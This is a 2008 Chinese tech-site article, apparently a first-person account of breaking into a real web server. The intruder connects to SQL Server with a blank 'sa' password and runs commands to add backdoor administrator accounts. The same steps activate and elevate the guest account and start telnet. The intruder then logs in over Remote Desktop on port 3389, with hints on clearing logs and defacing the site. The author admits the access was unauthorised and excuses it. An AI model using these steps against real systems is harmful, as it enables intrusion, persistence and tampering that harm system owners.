首页
登陆
注册
博客集
下载频道
网络硬盘
学院论坛
家园
智能模糊搜索
仅搜索标题
网站地图
收藏本站
高级搜索
新闻
:
IT新闻
互联网
微软
黑客新闻
网络
:
网络协议
故障
网络管理
TCP/IP
无线技术
解决方案
黑客
:
技术
漏洞
软件评测
安全资讯
数据
:
MSsql
Oracle
Mysql
PL/SQL
备份
系统:
Linux
vista
Windows
FTP
防火墙
注册表
服务器
:
行情
服务器应用
解决方案
WEB服务器
墙纸
:
风景壁纸
游戏壁纸
体育壁纸
汽车壁纸
人文壁纸
影视壁纸
广告壁纸
花卉壁纸
节日壁纸
动漫壁纸
明星壁纸
绘画壁纸
月历壁纸
当前位置: >
主页
>
数据库技术
>
MSsql
>
SQL配合3389的一次入侵
热门文章排行
巧用触发器对"SQL Serve
SQL Server 2000问答
问:SQL Server 200
ADO数据访问一点通
SQL Server成为低成本建
SQL Server数据库六种数
SQL Server性能分析参
将ACCESS的转化为SQL SE
拷贝的SQL Server 7数据
优化SQL Server服务器内
精采文章推荐
SQL Server存储过程入门
SQL的基本操作(1.数据类
SQLMail的原理及实际应
维护SQL Server数据库
简单查询和联合查询两方
怎样用SQL 2000 生成XML
SQL Server 2000的安全
SQL配合3389的一次入侵
SQL SERVER 2000 SP2 12
SQL SERVER 2000通讯管
最新更新文章
SQL Server存储过程入门
用ASP调用SQL的视图和存
SQL的基本操作(4.数据的
SQL的基本操作(3.表的相
SQL的基本操作(2.数据库
SQL的基本操作(1.数据类
SQLMail的原理及实际应
维护SQL Server数据库
配置SQL Server 2000选
Jboss下MS SQL Server配
SQL配合3389的一次入侵
编辑:
来源:
日期:
2008-02-24
我要投稿
家园
昨天晚上,朋友给我一台漏洞颇多的主机,哈哈,我没别的意思,只是练一下手而已,顺便把过程写下来,这台主机的漏洞实在多,CGI漏洞就30多个,SQL的sa这个用户的密码为空,开的端口12个,这台主机是100M的宽带,用来做“轰炸鸡”不错,一看这个网站,靠,居然是文化信息网,不敢打歪主意了,先进去看看,打开SqlExec.exe,这是连接数据库用的工具,收藏在“黑客入侵必备工具包”(下载地址http://www.sangel.net)里,在HOST那里填上对方IP,用户名为sa,密码为空就不用填,然后点Connnect就开始连接了,如图:
这样就表示连接成功,大家都知道sa是SQL数据库的管理员,所以可以执行任意指令,我们就在
DOS Commamd输入:
net user root 521521 /add
net localgroup administrators root /add
文章看多了也应该知道这是什么意思了吧?不用说了。看到成功的提示了,如图:
这样就留下后门了,看看是否填加了?输入:net user。哈哈,添加成功了,如图:
但我还是建议不要添加用户,否则很容易被看穿,所以我建议你在guest这个用户上做手脚,输入下面命令:
net user guest /adtive:yes
net user guest 521521
net localgroup administrators guest /add
就这样就激活了guest这个帐号,并把它的密码设为521521,还添加进管理员组,如果帐号本来就是的活的,就直接输入倒数两行命令就可以了,别忘了,如果目标主机没有开23端口的话,记得为它运行远程登陆服务,输入:net start telnet。现在我们有管理员帐号了,想做什么还不随心所欲?这台主机还开了3389端口,赶快用“终端服务客户端”(收藏在“黑客入侵必备工具包”里面),连接上去,就像操作自己的电脑一样,如下图:
点“连接”后过一会儿成功的话就到windows2000的登陆窗口,输入用户名和密码进去吧,如图:
点年“确定”一会就进去了,首先映入眼帘的是桌面,如图:
先冲到“控制面板”玩玩,如图:
点“管理工具”进去管理吧。如图:
你可以干什么都行,处理一下日志先,然后管理一下用户,如图
想黑他的主页很容易的,现在还不知道主页目录是什么,我们可以到网站上看一张图片的文件名,然后进来搜索就好了,看HTML代码知道相对路径,然后你看着办吧!国内主机还是不要做什么的好,否则很可能第二天收到法庭的传单就不好了,如果你破坏了数据就不是黑客了,是骇客,这个名声可不好啊!我看看好象网站没有联系方法,我干脆就在桌面留言了,看看程序组有什么?哈哈,有Macromedia Dreamweaver 4,做个HTML页面,如图:
取个醒目的名字叫“全部人员看这里”吧,然后把文件复制到各个用户的桌面,路径是:
c:\Documents and Settings\用户名\桌面
这次行动也就结束了,我真为我国的网络安全质量担忧啊,特别是管理员的素质,为什么偏偏别人认为我们这样进入就不好呢?我觉得被我们进入总好过不法之徒进入吧?如果让我们这些业余的替换掉这些现任管理员,可能我国的网络就不会像这么弱不禁风了吧。我写这篇文章没有叫你去攻击,也没有叫你去破坏,权当学习参考,如果你因本文而进入国内主机,请不要修改任何数据或执行任何毁灭性操作,并通知其管理员,谢谢合作,另外,本文有和遗漏 或错误,请指出,谢谢支持!
复制本网址推荐给QQ/Msn好友分享!
上一篇:
SQL SERVER 2000 SP2 12命令的溢出攻击实现
下一篇:
SQL Server 2000的安全配置
关键字:
智能模糊搜索
仅搜索标题
【
文章评论
】 【
收藏本文
】 【
推荐好友
】 【
打印本文
】 【
论坛讨论
】
相关文章:
·
SQL Server存储过程入门案例详解
·
用ASP调用SQL的视图和存储过程
·
SQL的基本操作(4.数据的检索)
文章评论:
(0条)
请留名:
匿名评论
点击查看所有评论
责任编辑:IT学院
声明:刊登此文章是为了传递更多信息,文章内容仅供参考,转载请注明出处。